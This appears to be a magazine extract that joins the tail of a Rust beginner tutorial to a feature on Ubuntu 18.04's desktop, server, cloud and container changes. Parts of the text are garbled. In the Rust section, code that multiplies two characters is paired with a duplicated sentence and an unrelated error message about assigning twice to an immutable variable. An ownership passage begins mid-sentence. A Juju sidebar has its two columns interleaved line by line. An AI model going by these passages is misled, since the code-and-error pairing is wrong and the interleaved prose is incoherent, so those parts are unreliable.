16-bit integer                        i16            u16
32-bit integer                        i32            u32
64-bit integer                        i64            u64
64-bit/32-bit int (platform int size) isize          usize

Left: Rust provides good support for many different integer and floating point types, so you are never left guessing about how many bits your data takes up
Package management with Cargo
Almost all Rust projects use the special built-in package-management system called Cargo. If you installed Rust using the installation script, it will already be installed. If you installed Rust from your package manager, there's a chance that you will have to install Cargo separately. You can check whether Cargo is installed by running the following command.

$ cargo --version

Cargo is incredibly useful for keeping track of dependencies in projects. In order to turn our Rust project into a Cargo project, we'll need to go through a few extra steps. First, let's go back a directory, using $ cd ... Then use the following command to create a new directory that will hold our Cargo project.

$ cargo new hello_cargo --bin
Created binary (application) 'hello_cargo' project
$ cd hello_cargo

Look at the contents of this directory with $ ls and you'll see that it contains a file called Cargo.toml and a directory called src. The src directory already contains a file, main.rs, that is exactly the same as the hello.rs that we created earlier. In fact, we can run it straight away from inside the hello_cargo directory using the command cargo run. We won't be using the capabilities of Cargo in this tutorial, but it's a good idea to get into the habit of using it so you can take advantage of it later on.
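Cargo.toml is where Cargo records the project's metadata and dependencies. A freshly generated file looks roughly like this – the exact fields can vary slightly between Cargo versions:

[package]
name = "hello_cargo"
version = "0.1.0"
authors = ["Your Name <[email protected]>"]

[dependencies]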
Variables and typing
Strong typing is central to the safety features provided by Rust. In C, it is perfectly legal to write code like this:

int x = 'A' * 'B' / 'C';
printf("%c\n", x);

Multiplying and dividing characters shouldn't make sense, and neither should putting them into integer values. Weak typing is sometimes useful, but on the whole it tends to obscure bugs in the code. If we have code in which we are multiplying character values together, it is very likely that we are making a mistake. If the compiler allows us to do this without complaining, we could be unaware of that mistake until much later on, when it might be a lot more difficult to track down. Rust is considered 'safe' precisely because it stops you doing things that shouldn't make sense.
For example, let's go into the file main.rs inside the src directory and add the following lines of code into the main function.

let letter_a = 'A';
let letter_b = 'B';
let product = letter_a * letter_b;

When we try to compile this code using cargo run, Rust will display a clear error message:

$ cargo run
When we try to compile this code using cargo run, Rust gets angry and presents us with the error message cannot assign twice to immutable variable. What this illustrates is that variables in Rust are immutable by default – that is, they hold one particular value and cannot be assigned to more than once.
The reason for this is that immutable variables are much safer in general than mutable ones, especially in complex multithreaded systems, where changes in the values of variables make the behaviour of the system much harder to reason about. We recommend that you stick to immutable variables as far as possible.
Nevertheless, sometimes mutable variables are useful. An example is the while loop in Figure 2. To tell Rust that a variable should be mutable, we use the mut keyword.

let mut i = 0;
i = 1; // Compiles fine.

An alternative to using mut is what Rust calls 'shadowing'. Shadowing is when we use the same name for two different variables in the same scope. For example:

let x = 0;
let x = 1;

Here, the second line let x = 1; creates a new variable called x and assigns it the value 1. From this point, whenever we refer to x in the code, we are referring to the second variable (unless we shadow again and produce a third variable called x). Functionally, there is no difference between this and calling the second variable y or something else: we do it in order to avoid having to think up new variable names. Since it is impossible to refer to the original variable x once we have shadowed it, you should treat shadowing as a more limited form of mutability: you can imagine that the variable x has changed value from 0 to 1, as long as you remember that they are in fact two separate immutable variables.
You should use shadowing rather than mut if you have the chance, since it avoids introducing actual mutable variables. Shadowing is, however, less powerful than mutability: indeed, it is nothing more than syntactic sugar for immutable variables. The while loop in Figure 2 doesn't work with shadowing, because in this case the condition i <= 8 refers to the original i, rather than the shadowed value.

Control-flow statements
While we haven't mentioned them much here, Rust has plenty of control-flow statements; the looping constructs are illustrated in Figures 2 and 3. The simplest looping construct is loop, which starts an infinite loop. The while loop is slightly more sophisticated, and loops round as long as a specified Boolean condition is true. The for loop can be used to iterate over collections such as arrays and ranges.
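Figures 2 and 3 aren't reproduced in this extract, but a while loop of the kind described – counting with a mutable variable and the condition i <= 8 – would look something like this:

fn main() {
    let mut i = 0;
    while i <= 8 {
        println!("i is now {}", i);
        i += 1;
    }
}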
Functions
No systems programming language would be complete without the ability to write our own functions. We have already seen one example of a function: the main() function that runs when the program starts. main() does not take any input, but we can also write functions that take in values as parameters. For example, we could write the little program shown in Figure 4, which prints out the two solutions to a quadratic equation (assuming that equation has only real solutions).

Figure 4

fn solve_quadratic_equation(a: f64, b: f64, c: f64) {
    let d = (b * b) - (4.0 * a * c);
    println!("The first solution is {}", (-b + d.sqrt()) / (2.0 * a));
    println!("The second solution is {}", (-b - d.sqrt()) / (2.0 * a));
}

fn main() {
    solve_quadratic_equation(1.0, -5.0, 6.0);
}

One thing that is important to notice is that the parameters to a function must always take type signatures. Here, we have required that the numbers a, b and c be 64-bit floating point types. One reason for this restriction is that the main tool Rust uses to infer types of variables is by looking at when they are passed into or out of functions. So, by forcing us to specify types of function parameters, Rust is better able to enable us not to include them elsewhere. For example, when we call solve_quadratic_equation(1.0, -5.0, 6.0); Rust knows that the number 5.0 should be a 64-bit float precisely because we have included the type signature in the function.
We can also return values from functions. The syntax for this is a bit different from that used in C, and is more similar to that of functional languages such as Haskell. We use the arrow -> to specify the return value of a function. For example, in Figure 5 we have a modified version of the quadratic equation function from Figure 4.

Figure 5

fn solve_quadratic_equation(a: f64, b: f64, c: f64) -> (f64, f64) {
    let d = (b * b) - (4.0 * a * c);
    let first_solution = (-b + d.sqrt()) / (2.0 * a);
    let second_solution = (-b - d.sqrt()) / (2.0 * a);
    (first_solution, second_solution)
}

fn main() {
    let (solution_1, solution_2) = solve_quadratic_equation(1.0, -5.0, 6.0);
    println!("{} {}", solution_1, solution_2);
}

Above Left: The idiomatic way to return a value from a function in Rust is to put the 'return value' as the last statement in the function, without a semicolon
Left: Rust requires us to give type signatures for parameters to a function, so that we don't need to give them elsewhere
to as soon as that variable goes out of scope. Other languages can't do this, because there's always a chance that some other variable is pointing to the same bytes. In Rust, on the other hand, there is a guarantee that such a situation can never occur, since it is impossible for two variables to point to the same data; as soon as we point a new variable to a piece of data, it automatically invalidates the old pointer.
This is a bit like C++'s unique_ptr: if we have two unique_ptr pointers, we cannot set one to be equal to the other, but must instead use the move function, which invalidates the first pointer. The difference is that 'invalidate' here means that the first pointer is set to null, so that attempting to de-reference it later on will result in a segmentation fault at runtime. By contrast, de-referencing an invalidated pointer in Rust causes a compiler error, helping us to catch bugs much earlier on.

Passing values
Another way that ownership is transferred is by passing values to functions. If we have a variable that points to some bytes on the heap and we pass it into a function, the parameter inside that function takes ownership of the variable. Let's look at an example; for a change, we'll use Rust's Box::new instead of String::from. Box::new allocates some memory, initialising it to a given value, and returns the 'boxed value' – that is, a variable pointing to that memory.
The code in Figure 7 includes a function, steal_ownership, that takes a boxed integer as a parameter. The function does not actually do anything much with the parameter, but the fact that it takes in the value means that it also takes ownership of the bytes that it points to (which have the value 2018). When the function returns, x goes out of scope and the memory will be freed. This means that the code as it stands will not compile, because the last println! statement refers to current_year after it has been invalidated.
We can stop this from happening by returning the value back from the function, as in Figure 8. When we return a pointer value, we transfer ownership back to the calling context. In this case, we have returned x, which gets put into the new (shadowed) variable current_year in the main() function.

Figure 8

fn borrow_ownership(x: Box<i32>) -> Box<i32> {
    println!("{} borrowed!", x);
    x
}

Top Left: Returning values from functions can restore ownership back to the calling context

This is fine, but it can be a bit annoying if we also want to return separate values from the function. Luckily, Rust provides a way of passing pointer values to functions that does not transfer ownership. For this we use something called a reference, which is a bit like a 'borrowed value': it allows us to look at the contents of the box, but does not transfer ownership. Figure 9 shows a more concise version of the code in Figure 8 using references. In order to signify that a parameter to a function is a reference, we need to put an ampersand & in front of the parameter name, and we also need an & in front of the name of the variable we are passing in (in this case, current_year).

Mutable references
If you use references to pass values to functions without transferring ownership, you might notice that you can't modify these values within the functions. This is a deliberate design decision: since we can have more than one reference to the same data at a time, modification is only allowed through a dedicated mutable reference, &mut, and only one of those can exist at once.
There's obviously a lot more to Rust than we can cover in this introduction, but hopefully it has given you a taste of what this excellent language can do.
Feature Ubuntu 18.04 LTS
Top features of Ubuntu 18.04
Ubuntu 'Bionic Beaver' 18.04 represents the first long term support release of a new generation of the leading Linux distribution, with over 30 exciting changes
When major changes happen in a distribution that's as widely used as the Canonical-supported Ubuntu, the Linux universe takes notice. Ubuntu's release schedule is such that seismic shifts typically take place outside long term support (LTS) releases, before then being included later in an LTS version. Ubuntu's regular releases are supported for nine months, but for LTS releases it's five years, which means that a great deal of care and preparation takes place to ensure that what goes into a LTS is as stable as possible. The most recent big change in Ubuntu came with 17.10 Artful Aardvark, which was released in October 2017. This has provided a short but valuable window for developers to shake down the changes before deciding on exactly what makes the cut for the LTS version; as you'll see, not everything made it in, but 18.04 is groundbreaking nonetheless.
Ubuntu 18.04 'Bionic Beaver' represents a shift not only in technology, but also marks a change in perspective for Canonical, the company that supports Ubuntu's development, as it adjusts the focus of its business. A year ago, founder Mark Shuttleworth announced that the company would no longer focus on convergence as its priority, and would instead look to invest in areas that provided growing revenue opportunities – specifically in the server and VM, cloud infrastructure, cloud operations and IoT/Ubuntu Core markets.
While this broadening of focus might at first appear as a cause for concern for desktop users, the reality is quite different. Ubuntu 17.10 demonstrated that a significant change to Ubuntu could be delivered without disruption, and the company has also demonstrated a keen interest in taking on board user feedback to help shape 18.04. A survey distributed to help choose the Ubuntu default applications elicited tens of thousands of responses and was used to refine the release. Ubuntu continues to be a distribution that targets a broad range of users; basic web or office users, developers, sysadmins, robotics engineers – they are all catered for. Of course, if the default Ubuntu isn't quite to your taste, a wide range of alternative flavours continue to be available for a variety of use cases, hardware configurations or personal preference.
Why is this release called 'Bionic Beaver'? Well, Mark Shuttleworth described the beaver as having an "energetic attitude, industrious nature and engineering prowess", which he then likened to Ubuntu contributors. Meanwhile, the 'Bionic' part is a hat-tip to the growing number of robots running Ubuntu Core. Nice!

at a glance
• Desktop p60 – Ubuntu 18.04 ditches the Unity desktop and brings GNOME on X.Org to LTS for the first time in a long time.
• Server p62 – The Server release of Bionic Beaver sports a much-improved installer and a new, smaller ISO file for a minimal install option.
• Cloud p64 – The latest Ubuntu release offers tighter integration with Canonical's cloud offerings and a simplified deployment process.
• Containers p66 – As well as a new release of LXD, Ubuntu continues to offer support for Kubernetes and Docker on public, private, hybrid or bare-metal clouds.
• Core/IoT/Robotics p68 – Ubuntu is experiencing huge growth in the areas of IoT players and robotics, making use of Canonical's investment in the snap ecosystem.
Ubuntu Desktop
The new GNOME on Ubuntu era makes its way to LTS
Should you be upgrading to Ubuntu 18.04 (named after the fourth month of 2018) from 17.10, the latest version will feel like a regular incremental upgrade, with the major changes having happened in the last release. If you're upgrading from the last LTS version, you're in for more of a surprise.
The biggest visual change is the shift from Unity to GNOME. Bionic ships with GNOME version 3.28, running the 'Ambiance' theme as always, and is tweaked to provide as painless a transition as possible for existing users. This also extends to running Nautilus 3.26 rather than the latest 3.28, as the latest release removes the ability to put shortcuts on the desktop. You do get a nice new Bionic Beaver-themed desktop background of course, with support for up to 8K displays!
The original expectation was that this release would ship with an all-new theme developed by the community, but unfortunately, despite work on the theme kicking off last November, it wasn't ready in time for the 18.04 user-interface freeze due to a number of outstanding bugs and overall lack of broader testing. That's disappointing for sure, but given the nature of a LTS release, stability is always the primary concern. With that said, for those who want to install the new theme – called Communitheme – the expectation is that it will be made available in the future via an official snap package. The intention is that the theme will appear as a separate session on the login screen, making it straightforward to test and be reverted if needed, rather than having to use the GNOME Tweak Tool. One other side-effect of the switch to GNOME is that the login screen is now powered by GDM rather than lightdm.

Above: Ubuntu now includes GNOME 3.28, with tweaks and customisations designed to improve familiarity for migrating Unity users, together with an updated Nautilus look and feel
quick guide
Ubuntu flavours
Kubuntu
Kubuntu brings KDE Plasma to Ubuntu, providing an alternative high-end desktop environment. If you're switching to Ubuntu 18.04 from the last LTS release, you're going to change your desktop environment anyway, so what about trying KDE? The Qt-based desktop is fast, beautiful and quite a different option!

Lubuntu
Lubuntu is a more lightweight version of Ubuntu, running the LXDE desktop environment. If you're running Ubuntu on lower-spec hardware – perhaps even a Raspberry Pi – the light but fully featured Lubuntu may be worth a look. Unlike the main flavour, 32-bit images are still available.

Xubuntu
Xubuntu provides another lightweight alternative, using the Xfce desktop environment. Like Lubuntu, Xubuntu focuses on running well on modest hardware, but has all the applications pre-installed to get you up and running right out of the box. Beautiful design also features extensively.
In addition to Communitheme, another feature that didn't make the cut for Bionic – and in fact has been reverted from the previous release – is the switch from X.Org to Wayland as the default display server. Once again the focus on stability and some outstanding issues meant that it just wasn't felt ready for prime-time.
Snaps, the universal Linux packaging format, is a growing focus with each Ubuntu release and comes to the fore in 18.04 with increased prominence in the Software Centre and a standard set installed, including calculator, characters, logs and a system monitor. Snaps are designed to bundle all the dependencies an application needs, therefore reducing common issues with missing libraries and the need to repack an app as multiple versions for several different distributions.
Ubuntu 18.04 – which is the first LTS release to come with ISOs for 64-bit machines only – ships with version 4.15 of the Linux kernel. This version includes Meltdown and Spectre patches as well as secure, encrypted virtualisation and better graphics support for AMD processors, a whole host of new drivers, and a huge number of minor fixes since version 4.13 and particularly since version 4.10 in the last LTS point release.

Other changes
If you're installing the new release from scratch, you may spot several minor changes. While the Ubiquity installer is still used, there are some additional options to be aware of. The first is the 'minimal' option, which installs Ubuntu without most of the pre-installed software. This saves around 500MB, but the resulting install itself is not particularly lightweight, particularly when compared to some alternative flavours.
When partitioning, you will no longer be prompted to create a swap partition. This is because file-based swap is now used. Finally, Ubuntu 18.04 will collect data about your Ubuntu flavour, hardware, location and so on by default, with the ability to opt out if desired. The data collected by this method will be anonymous, which has mostly alleviated privacy concerns from the community. After installation, you'll notice significant boot-speed improvements in the new release.
Among the raft of software updates, there are some that are particularly worthy of note, such as the addition of colour emoji support (via Noto Color Emoji), GNOME To-Do and the upgrading of LibreOffice to version 6. The Linux office suite continues to go from strength to strength, with the latest release further developing the Notebookbar, adding even better forms support, providing enhanced mail merging, including initial OpenPGP support and boasting even better interoperability with other (Microsoft) office suites.
For web developers working on Ubuntu, it should be noted that ahead of Python 2's upstream end of life in 2020, it has been removed from the main repositories and Python 3 is now installed by default. You will need to enable the 'universe' repository to install the older version in this release. Users of the GNOME Boxes app will be pleased to learn that 'spice-vdagent' is now pre-installed, providing better performance for Spice clients. This is an open source project to provide remote access to virtual machines in a seamless way, so you can play videos, record audio, share USB devices and share folders without complications.

quick tip
Install Communitheme
You can try Communitheme yourself. Use sudo add-apt-repository ppa:communitheme/ppa, sudo apt update then sudo apt install ubuntu-communitheme-session.
Ubuntu Budgie
Ubuntu Budgie uses the simplicity and elegance of the Budgie interface to produce a traditional desktop-orientated distro with a modern paradigm. It's focused on offering a clean and yet powerful desktop.

Ubuntu MATE
The Ubuntu MATE project is effectively the continuation of the GNOME 2 project. Its tried-and-tested desktop metaphor is easy to use, and prebuilt images are provided for numerous Raspberry Pi devices.

Ubuntu Studio
Ubuntu Studio focuses on taking the base desktop image and configuring it to provide best performance for creative pros. It also includes a default software set suited to audio, graphics, video and publishing use.
Ubuntu Server
Server installs are hugely important to Ubuntu

While desktop users may be keen to update to the 'latest and greatest', that doesn't apply to Ubuntu Server users. Stability is vital in the server environment and as such it makes sense to stay on LTS versions, upgrading only to point releases and only then upgrading systems with caution after a new version.
The first change for server users comes early, with a long-overdue installer update. Ubuntu Server now uses Subiquity (aka 'Ubiquity for servers'), which finally brings to servers the live-session support and fast installation using Curtin (and boy, is it fast!) that has long been present on the desktop. The installer is still text-based as you'd expect, but is far more pleasant to use. The installer does a great job of replicating the flow of the desktop setup but is tailored to a server environment.

quick guide
Install a 32-bit version
If you still need a 32-bit install, you can use the netboot image. This tiny image – available in ISO and USB stick versions together with the files needed to carry out a PXE network boot – includes just enough of the distribution to be able to boot from a network to download the rest of the required files. When launched, the installer prompts for basic network configuration including an optional HTTP proxy, language and keyboard preferences, mirror selection and user details, before installing the distribution as normal by downloading the required packages on the fly. Another option is to make your own custom ISO; Cubic, available via sudo apt-add-repository ppa:cubic-wizard/release && sudo apt install cubic, provides a GUI for this.

Above: You'll need to use the -d switch to perform an upgrade before the first LTS point release

As well as the underlying updates in the desktop release there are several server-specific improvements in Bionic Beaver. LXD, the pure container hypervisor, has been updated to version 3.0. This release, which itself is a LTS version with support until June 2023, adds native clustering right out of the box, physical-to-container migration via lxd-p2c, support for Nvidia runtime passthrough and a host of other fixes and improvements. QEMU, the open source machine emulator and virtualiser, is updated to version 2.11.1. Meltdown and Spectre mitigations are included in the new release, although using the mitigations requires more than just the QEMU upgrade – the process is detailed in a post on the project's blog. RDMA support is now enabled, improving network latency and throughput. Libvirt, the virtualisation API, has been updated to version 4, bringing the latest improvements to this software designed for automated management of virtualisation hosts.
If you deal with cloud images, you'll be pleased to hear that cloud-init – a set of Python scripts and utilities for working with said images – gets a bump to the very latest 18.2 version, with support for additional clouds, additional Ubuntu modules, Puppet 4 and speed improvements when working with Azure. Ubuntu 18.04 also updates DPDK (a set of data plane libraries and
network interface controller drivers for fast packet processing) to the latest stable release branch, 17.11.x. The intention is that future stable updates to this branch will be made available to the Ubuntu LTS release by a SRU (StableReleaseUpdates) model, which is new to DPDK.
Open vSwitch, the multilayer virtual switch designed to enable massive network automation through programmatic extension, still supports standard management interfaces and protocols such as NetFlow, sFlow, IPFIX, RSPAN, CLI, LACP and 802.1ag. It has been updated to version 2.9, which includes support for the latest DPDK and the latest Linux kernel.
Ntpd, for a long time the staple for NTP time management, is replaced by Chrony in Ubuntu 18.04. The change was made to allow the system clock to synchronise more quickly and accurately, particularly in situations when internet access is brief or congested, although some legacy NTP modes like broadcast clients or multicast server/clients are no longer included. Ntpd is still available from the universe repository, but as it is subject to only 'best endeavours' security updates, its use is not generally recommended. Note that systemd-timesyncd is installed by default and Chrony only needs to be used should you wish to take advantage of its enhanced features.
Bionic marks the end of the LTS road for ifupdown and /etc/network/interfaces. Network devices are now configured using netplan and YAML files stored in /etc/netplan on all new Ubuntu installs. Administrators can use netplan ifupdown-migrate to perform simple migrations on existing installs. The change to netplan is focused on making it more straightforward to describe complex network configs, as well as providing a more consistent experience when dealing with multiple systems via MAAS or when using cloud provisioning via cloud-init.
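For reference – this example isn't from the article, and the interface name is just a placeholder – a minimal netplan file such as /etc/netplan/01-netcfg.yaml that brings one interface up with DHCP looks something like this:

network:
  version: 2
  renderer: networkd
  ethernets:
    enp0s3:
      dhcp4: true

A configuration written this way is applied with sudo netplan apply.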
quick guide
Using the new Subiquity
The ncurses-based Subiquity installer is a huge improvement over previous versions of Ubuntu and makes installing the Server distribution a breeze. It should be noted, though, that the feature set is a little limited for some use cases, with no support yet for LVM, RAID or multipath, although these are expected in a future release. After booting the ISO, Subiquity prompts for language and keyboard settings (with automatic keyboard identification offered) before providing the options to install the main OS, a MAAS Region Controller or a MAAS Rack Controller. Network interfaces can be configured with DHCP or static addresses (both IPv4 and IPv6) and, as on the desktop, automatic (full disk) or manual partitioning can be used. At this point, installation starts in the background and progress is shown at the bottom of the screen while user details are entered (including the ability to import SSH identities). A log summary is displayed on screen and a full log can be viewed at completion, before selecting the reboot option.

quick tip
No reboot required for updates with Livepatch
The Canonical Livepatch service enables critical kernel security fixes to be provided without rebooting. It's free for a small number of devices and is enhanced in Bionic with dynamic MOTD status updates.

When should I upgrade?
If you've read through the release notes for Bionic and you're happy with what's included, the upgrade process itself is straightforward: simply update your existing install and run sudo do-release-upgrade. Follow through the on-screen instructions and the updated packages will be downloaded and installed, with a final reboot required for the changes to take effect. Note, however, that the above process will only work for LTS-to-LTS upgrades once the first point release drops (that is, 18.04.1). To update before this time, you effectively need to pass the developer switch: sudo do-release-upgrade -d. This is an abundance of caution on Canonical's part, but it is prudent not to upgrade your fleet of servers the minute the ISO is available!
A sensible approach when performing a major upgrade, whether on a server or a desktop, is to run as full a test cycle as possible before making changes on a system that is effectively in a production state. This can be easily achieved using a tool like Clonezilla (https://clonezilla.org) if that's feasible, although there are several alternative approaches if you need to keep your system running during the process. Note that while it is technically possible to revert from an upgrade, it's not a particularly straightforward process and is therefore not particularly recommended.
Ubuntu Cloud
The Ubuntu push to the cloud gathers pace, with a broad product offering

Canonical has already highlighted the importance of Ubuntu Cloud to its revised strategy as a rapidly growing revenue stream. Ubuntu is well on the way to becoming the standard OS for cloud computing, with 70 per cent of public cloud workloads and 54 per cent of OpenStack clouds using the OS.
Canonical has supported OpenStack on Ubuntu since early 2011, but what exactly is it? OpenStack is a "cloud operating system that controls large pools of compute, storage, and networking resources throughout a datacentre, all managed through a dashboard that gives administrators control while empowering their users to provision resources through a web interface".
Getting started with OpenStack for your own use is straightforward, thanks to a tool called conjure-up. This is ideal if you want to quickly build an OpenStack cloud on a single machine in minutes; in addition, the same utility can also deploy to public clouds or to a group of four or more physical servers using MAAS (Metal As A Service – cloud-style provisioning for physical server hardware, particularly targeting big data, private cloud, PAAS and HPC). For local use, conjure-up can use LXD containers against version 3.0 of LXD included in Bionic Beaver. The LXD hypervisor runs unmodified Linux guest operating systems with VM-style operations at uncompromised speed. LXD containers provide the experience of virtual machines with the security of a hypervisor, but running much, much faster. On bare-metal, LXD containers are as fast as the native OS, which means that in the cloud you get subdivided machines without reduced performance.

Above: The 'conjure-up' tool includes several pre-packed 'spells' for cloud and container deployments

Conjure-up itself is installed as a snap package, as is LXD, which will increasingly become the Ubuntu way from 18.04 onwards. First install LXD using sudo snap install lxd followed by lxd init and newgrp lxd. Next, use sudo snap install conjure-up --classic and conjure-up to launch the tool itself. The text-based utility – it's built for servers, after all – provides a list of recommended 'spells'. Spells are descriptions of how software should be deployed and are made up of YAML files, charms and deployment scripts. The main conjure-up spells are stored in a GitHub registry at https://github.com/conjure-up/spells; however, spells can be hosted anywhere – a GitHub repo location can be passed directly to the tool, from which spells will be loaded.
quick guide
Use Juju to deploy a service
Juju ‘charms’ provide the easiest cs:elasticsearch. When the
way to simplify deployment and command completes, ElasticSearch
management of specific services. is up! By default, the application
Found at https://jujucharms. port (9200) is only available from the
com, charms cover many different instance itself, but changing this
scenarios including ops, analytics, is as simple as using the command
Apache, databases, network, juju expose elasticsearch. Use
monitoring, security, OpenStack juju status to confirm which ports
and more. Using the ElasticSearch are open. To open all ports, use the
charm as an example, using it is command juju set elasticsearch
as simple as entering juju deploy firewall_enabled=false.
'OpenStack with NovaLXD' is the best spell to start with – you'll note spells are also provided for big data analysis using Apache Hadoop and Spark, as well as for Kubernetes.
After selecting the spell, you'll be prompted to choose a setup location (localhost), configure network and storage, then provide a public key to enable you to access the newly deployed instance. Accept the default application configuration and hit 'Deploy'. Juju Controller – part of Juju, an open source application and service modelling tool – will then deploy your configuration. After setup completes, you'll be able to open the OpenStack Dashboard at http://<openstack ip>/horizon and log in with the default admin/openstack username and password to see what has been created. Use the lxc list command to validate that the system you've conjured up is running.

quick guide
Try Ubuntu in the cloud for free
Ubuntu offers exciting opportunities for deploying to the cloud, but due to the pricing models, costs can rack up quickly! Thankfully, if you want to try out some cloud deployments without spending any money, a number of providers have free offerings available. Amazon's AWS has the best deal, with a free tier that provides a server running 24 hours a day for a whole year, plus a host of add-on free services. Its 'Lightsail' offering also offers a free one-month trial of the basic instance. Google Cloud Platform offers $300 credit valid for 12 months, plus, like Amazon, a free product tier to get you started. DigitalOcean offers $100 to get started with its services and is a great alternative to the bigger players. You may not expect it, but Microsoft's Azure also has useful Linux options with £150 credit valid for 30 days and, once again, its own free low-usage tier. All these services are easy to set up and come with Ubuntu Server and container images.
Canonical also offers BootStack, which is an ongoing, fully managed private OpenStack cloud. This is ideal for on-premise deployments and is supplemented by a lighter-touch service, Foundation Cloud Build for Ubuntu OpenStack, where a Canonical team will build a highly available production cloud, implemented on-site in the shortest possible time. Foundation Cloud Build is well suited to redeploying or cloning existing cloud architecture. Should you want to manage your own deployment to public clouds, certified images are available for AWS, Azure, Google Cloud Platform, Rackspace and many other such services.

The charms of Juju
While conjure-up uses Juju internally, it can also be used directly to model, configure and manage services for deployment to all major public and private clouds with only a few commands. Over 300 preconfigured services are available in the Juju store (known as 'charms'), which are effectively scripts that simplify the deployment and management tasks of specific services. Of course, Juju is free and open source.
One further piece of the Ubuntu cloud puzzle is Canonical's 'Cloud Native Platform', which is a pure Kubernetes play. Cloud Native Platform is provided in partnership with Rancher Labs and delivers a turnkey application-delivery platform, built on Ubuntu, Kubernetes and Rancher, a Kubernetes management suite.
After you've deployed to the cloud, a common challenge is exactly how you manage the servers in your infrastructure. Canonical has a tool to help with this in the form of 'Landscape', to deploy, monitor and manage Ubuntu servers. Landscape monitors systems using a management agent installed on each machine, which in turn communicates with a centralised server to send back health metrics, update information and other data for up to 40,000 machines. Landscape is a paid service starting at 1¢ per machine per hour when used as a SaaS product; however it can be deployed for on-premise use on up to 10 machines for free.
Although many of the pieces of the cloud software stack are updated independently of the main OS, inclusion of these latest technologies in the LTS release drives forward the possibilities of what can be achieved using the cloud with Ubuntu.

quick tip
Set up Landscape
Add the PPA: sudo add-apt-repository ppa:landscape/17.03 and update your package list (sudo apt update). Install: sudo apt install landscape-server-quickstart.
Containers
Containers underpin the Ubuntu cloud

There's no doubt that containers are driving innovation in the cloud as a logical progression from VMs. Canonical's strategy has changed as technology has matured, but essentially it is supporting a wide range of technologies rather than backing a specific approach.
LXD is important to Ubuntu (Canonical founded and currently leads the project), with the latest release of the next-generation system container manager included in Ubuntu 18.04. LXD is particularly popular because it offers a user experience that is similar to that of virtual machines while using Linux containers instead. At its heart LXD is a privileged daemon which exposes a REST API. Clients, such as the command-line tool provided with LXD itself, then do everything through that REST API. This means that whether you're talking to your local host or a remote server, everything works the same way. LXD is secure by design thanks in part to unprivileged containers and resource restrictions; it is scalable for use on your own laptop or with thousands of container nodes; it is intuitive and image-based; it provides an easy way to transfer images from system to system; and it provides advanced control and passthrough for hardware resources, including network and storage. Of course, LXD is well integrated with OpenStack and, as a snap package, is easy to deploy not just on Ubuntu but on other Linux distributions too. Canonical claims LXD's containers are 25 per cent faster and offer 10 times the density of traditional VMware ESX or Linux KVM installs, which could translate to a significant cost saving.
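To get a feel for that workflow, here's a minimal sketch of the LXD client in action; the container name is an arbitrary example rather than anything prescribed by Canonical.

# Install LXD from the snap and launch a first container ('demo' is just an example name)
sudo snap install lxd
sudo lxd init --auto             # accept sensible defaults non-interactively
lxc launch ubuntu:18.04 demo     # pull the Ubuntu 18.04 image and start a container
lxc list                         # confirm it's running
lxc exec demo -- bash            # open a shell inside it, much like a lightweight VM

Whether these commands are aimed at the local daemon or a remote one, the client goes through the same REST API described above.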
Docker Engine on Ubuntu
Canonical's container offering wouldn't be complete without the two current heavyweights – Docker and Kubernetes. Docker Engine is a lightweight container runtime with a fully featured toolset that builds and runs your container. Over 65 per cent of all Docker-based scale-out operations run on Ubuntu. Stable, maintained releases of Docker are published and updated by Docker Inc as snap packages on Ubuntu, enabling direct access to the official Docker Engine for all Ubuntu users. Canonical also ensures global availability of secure Ubuntu images on Docker Hub, plus it provides Level 1 and Level 2 technical support for Docker Enterprise Edition and is backed by Docker Inc itself for Level 3 support.
If you're at the point where you're choosing which container technology to try, it might not be easy to decide between the above options. Fundamentally, LXD provides a classic virtual machine-like experience with all your usual administrative processes running, so it feels just like a normal Ubuntu system. Docker instances, meanwhile, typically contain only a single process or application per container. LXD is often used to make 'Infrastructure as a Service' OS-instance deployments much faster, whereas Docker is more often used by developers to make 'Platform as a Service' application instances more portable. Bear in mind that the options are not mutually exclusive – you can run Docker on LXD with no performance impact.
As with Docker, Kubernetes is well supported on Ubuntu. As well as the Cloud Native Platform Kubernetes delivered with Rancher, Canonical has a pure Kubernetes offering, known by the rather catchy name of The Canonical Distribution of Kubernetes. This is pure Kubernetes, tested across the widest range of clouds and private infrastructure with modern metrics and monitoring, developed in partnership with Google to ensure smooth operation between Google's Container Engine (GKE) service, with its Ubuntu worker nodes, and Canonical's Distribution of Kubernetes. The stack is platform-neutral for use on everything from Azure to bare metal, upgrades are frequent and security updates are automatically applied, a range of enterprise support options are available, the system is easily extensible, and Canonical even offers a fully managed service. Most importantly, Canonical Kubernetes leads in standards compliance against the reference implementation.
Kubernetes uses the same process we covered earlier for OpenStack courtesy of conjure-up, only this time you select 'The Canonical Distribution of Kubernetes' in the options. It's worth getting a free account at somewhere like AWS or Azure to provide a standalone cloud test environment.

quick tip
Kubernetes with Juju
Juju can be used to quickly deploy Kubernetes Core (a pure Kubernetes/etcd cluster with no additional services) or The Canonical Distribution of Kubernetes. Use juju deploy cs:bundle/kubernetes-core-292 or juju deploy cs:bundle/canonical-kubernetes-179 respectively.

how to
Deploy Kubernetes on Ubuntu to a cloud provider
Above: Conjure-up can be used to deploy The Canonical Distribution of Kubernetes either locally or to a supported cloud provider, including all the major players
Above: If deploying using conjure-up, several cloud providers are supported, including AWS (pictured), Azure, CloudSigma, Google, Joyent, Oracle and Rackspace

1 Install conjure-up
Conjure-up itself is installed from a snap package using the command sudo snap install conjure-up --classic. After installation, use conjure-up to launch the tool. If you're using a pre-snap release, install snapd first with sudo apt install snapd.

2 Select a Kubernetes spell and choose a cloud
After launching conjure-up and selecting 'The Canonical Distribution of Kubernetes' as your spell, you'll be prompted to choose a cloud provider. Choose 'new self-hosted controller' and accept the listed default apps to begin the deployment.

3 Connect to and manage your Kubernetes
After the deployment completes, the kubectl (for management) and kubefed (for federation) tools will be installed on your local machine. Use kubectl cluster-info to show the cluster status and confirm all is good.
quick guide
Migrate to containers
Ubuntu 18.04 includes LXD 3.0, which has a new tool called lxd-p2c. This makes it possible to import a system's filesystem into an LXD container using the LXD API. After installation, the resulting binary can be transferred to any system that you want to turn into a container. Point it at a remote LXD server and the entire system's filesystem will be transferred using the LXD migration API, and a new container created. This tool can be used not just on physical machines, but from within VMs such as VirtualBox or VMware.
Another alternative migration path is from a physical machine or VM to OpenStack. This is possible, but slightly more involved. First, SELinux needs to be disabled by editing the /etc/selinux/config file. Next you need to ensure that eth0 is configured for DHCP. Finally, to allow OpenStack to inject the SSH key, you must ensure that cloud-init and curl are installed. With that done, simply create a raw disk image (use VBoxManage clonehd with the raw format if migrating from VirtualBox) and test your image using the kvm command. You then just need to upload your image to OpenStack, register the image, and you should be able to start a new instance.
